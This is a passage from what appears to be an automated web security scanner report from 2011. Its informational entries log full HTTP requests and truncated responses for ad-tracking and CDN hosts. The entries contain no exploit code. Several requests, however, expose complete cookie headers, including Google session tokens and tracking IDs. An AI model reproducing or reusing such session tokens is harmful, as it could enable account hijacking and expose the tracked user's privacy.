Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=DF9qBZyty5yjGD3jvSxv1g; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRj6f-4AUlLipUgWN_wuO6t53nd9JmxbvZ_W-1oR-8-SaiPAdXRK4JXUtEp2wFxov7L7K2IUs0NN_D7fbCnl5hOor_vWa1l8eIYTgMZ62Ta0zFpO49zlHFwKxdLGNyk7lE5-OxMDws0Cv_cRzInX9ya84yTO0ELIyf4zh8DDmuFQtxahrdU1xrdlb6R-4-435VlRnljnEs8kNKwcSUW1o1Tnk3osBq0wHG-5tjyF7bmNf25vklS_SBSrTiYAeu-qLWAvysK-50K_ALHzITRWPKomo-6Dw-NTco8CdlnVBznEfI

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Sat, 17 Sep 2011 00:58:43 GMT
Expires: Sat, 17 Sep 2011 00:58:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

26.24. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=DF9qBZyty5yjGD3jvSxv1g; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRj6f-4AUlLipUgWN_wuO6t53nd9JmxbvZ_W-1oR-8-SaiPAdXRK4JXUtEp2wFxov7L7K2IUs0NN_D7fbCnl5hOor_vWa1l8eIYTgMZ62Ta0zFpO49zlHFwKxdLGNyk7lE5-OxMDws0Cv_cRzInX9ya84yTO0ELIyf4zh8DDmuFQtxahrdU1xrdlb6R-4-435VlRnljnEs8kNKwcSUW1o1Tnk3osBq0wHG-5tjyF7bmNf25vklS_SBSrTiYAeu-qLWAvysK-50K_ALHzITRWPKomo-6Dw-NTco8CdlnVBznEfI

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Sat, 17 Sep 2011 00:57:10 GMT
Expires: Sat, 17 Sep 2011 00:57:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

26.25. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256953&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238953086&bpp=52&shv=r20110907&jsv=r20110914&correlator=1316238953178&frm=4&adk=974859732&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=312&xpc=AZ4D7RBXS0&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=DF9qBZyty5yjGD3jvSxv1g; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRj6f-4AUlLipUgWN_wuO6t53nd9JmxbvZ_W-1oR-8-SaiPAdXRK4JXUtEp2wFxov7L7K2IUs0NN_D7fbCnl5hOor_vWa1l8eIYTgMZ62Ta0zFpO49zlHFwKxdLGNyk7lE5-OxMDws0Cv_cRzInX9ya84yTO0ELIyf4zh8DDmuFQtxahrdU1xrdlb6R-4-435VlRnljnEs8kNKwcSUW1o1Tnk3osBq0wHG-5tjyF7bmNf25vklS_SBSrTiYAeu-qLWAvysK-50K_ALHzITRWPKomo-6Dw-NTco8CdlnVBznEfI

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Sat, 17 Sep 2011 00:57:09 GMT
Expires: Sat, 17 Sep 2011 00:57:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

26.26. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=64&exchange_id=8 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=16233E2D-E708-4A27-9A6C-AFFA9B0751F6&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38484872%26rk1%3D72091245%26rk2%3D1316239534.984%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:04:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 17-Sep-2011 01:03:49 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 572

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://tags.bluekai.com/site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID
...[SNIP]...

26.27. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.wp.com
Path:   /wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif

Request

GET /wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif HTTP/1.1
Host: s0.wp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s0.wp.com/wp-content/themes/vip/tedconfblog/style.css?m=1300128116g

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Fri, 16 Sep 2011 19:54:25 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

26.28. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtemplate.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.wp.com
Path:   /wp-content/themes/vip/images/bg_wrap_viewtemplate.gif

Request

GET /wp-content/themes/vip/images/bg_wrap_viewtemplate.gif HTTP/1.1
Host: s0.wp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s0.wp.com/wp-content/themes/vip/tedconfblog/style.css?m=1300128116g

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Fri, 16 Sep 2011 19:54:25 GMT
Server: nginx
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

26.29. http://sana.newsinc.com/sana.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /sana.html

Request

GET /sana.html?wid=1957&uut=802756E5-8724-4943-AEFB-8B9150565A781316021953542&furl=http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html&purl=&ssid=bostonherald_top&anid=90017&ltype=1&plid=507&rdm=475681053 HTTP/1.1
Host: sana.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "b36bf549d471e0b15dc89899e8b573f7:1307641380"
Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:00:31 GMT
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head></head>
<body></body>
<html
...[SNIP]...

26.30. http://search.alepo.com/img/onebyone.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.alepo.com
Path:   /img/onebyone.gif

Request

GET /img/onebyone.gif HTTP/1.1
Host: search.alepo.com
Proxy-Connection: keep-alive
Referer: http://search.alepo.com/find.html?pageid=r&id=78355399&query=XSL&ics=1&fr=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=18704489.631393116.1316220585.1316220585.1316220585.1; __utmb=18704489.4.10.1316220585; __utmc=18704489; __utmz=18704489.1316220585.1.1.utmcsr=radius-server.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 404 Not Found
Server: FreeFind/8.2
Content-Type: text/html
Content-Length: 1519
Date: Fri, 16 Sep 2011 19:49:17 GMT

<HTML>
<HEAD>
<TITLE>404 Page Not Found</TITLE>
</HEAD>
<BODY BGCOLOR="b5b5b5">
<center>
<!-- Copyright 2003 FreeFind.com -->

<font face="Arial,Helvetica" size="-2">

<!-- start of border t
...[SNIP]...

26.31. http://secure-us.imrworldwide.com/cgi-bin/m  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Request

GET /cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=www.tmz.com HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:19 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 430

<!doctype html><html><body><iframe src="http://secure-us.imrworldwide.com/ocr/e?aHR0cDovL3d3dy5mYWNlYm9vay5jb20vYnJhbmRsaWZ0LnBocD9jYW1wYWlnbl9pZD1GU0l1QUZZRkFnX18mY3JlYXRpdmVfaWQ9Y2xKYUFsb0NCRjBfJnBs
...[SNIP]...

26.32. http://secure-us.imrworldwide.com/ocr/e  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /ocr/e

Request

GET /ocr/e?aHR0cDovL3d3dy5mYWNlYm9vay5jb20vYnJhbmRsaWZ0LnBocD9jYW1wYWlnbl9pZD1GU0l1QUZZRkFnX18mY3JlYXRpdmVfaWQ9Y2xKYUFsb0NCRjBfJnBsYWNlbWVudF9pZD1jRmhYQzFjR0FsOF8mbWVkaWFfdHlwZT1pbWFnZSZjb250ZW50X3R5cGU9Zm0mc2VnbWVudDE9VVMmc2VnbWVudDI9NjIzJmg9NTgzOGE5Y2MyYw__ HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
Referer: http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT20680&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5750480&cr=43918246&pc=69485624&r=6620679&si=www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:01:21 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 282

<!doctype html><html><body><img src="http://www.facebook.com/brandlift.php?campaign_id=FSIuAFYFAg__&creative_id=clJaAloCBF0_&placement_id=cFhXC1cGAl8_&media_type=image&content_type=fm&segment1=US&segm
...[SNIP]...

26.33. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0; G14853=C1S98373-1-0-0-0-1315398787-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-3-0-0-0-1315313090-907675; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 00:52:45 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 00:52:45 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

26.34. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.8495062424335629&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1861
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_22455_875178760=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

26.35. http://squirrelmail.org/sflogo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://squirrelmail.org
Path:   /sflogo.html

Request

GET /sflogo.html HTTP/1.1
Host: squirrelmail.org
Proxy-Connection: keep-alive
Referer: http://squirrelmail.org/wiki/MailServerIMAPProblem
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:45 GMT
Server: Apache
Last-Modified: Thu, 09 Jul 2009 01:48:17 GMT
ETag: "58e8c6-2c4-46e3c0cb31a40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 708
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...

26.36. http://static.scanscout.com/optout/iframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.scanscout.com
Path:   /optout/iframe.html

Request

GET /optout/iframe.html?http://bostonherald.com/track/inside_track/view.bg?articleid=1366225&srvc=track&position=2 HTTP/1.1
Host: static.scanscout.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view.bg?articleid=1366225&srvc=track&position=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 21 Jul 2011 11:27:38 GMT
ETag: "11580a5-34d-4a892a2de1e80"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 845
Cache-Control: max-age=7200
Date: Sat, 17 Sep 2011 01:47:31 GMT
Connection: close

<html>
<body>
<script>
var message = (document.cookie.indexOf("ENFORCE_PRIVACY") < 0) ? "false" : "true";
if (window.parent.postMessage) {
window.onload = function() {
var s = document.loc
...[SNIP]...

26.37. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/221/tmz/728x90/homepage_btf

Request

GET /ad/iframe/221/tmz/728x90/homepage_btf?t=1316238825238&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.tmz.com%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 876
Content-Type: text/html
Date: Sat, 17 Sep 2011 00:53:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...

26.38. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/unified/300x250/bh_656864_29757782

Request

GET /ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
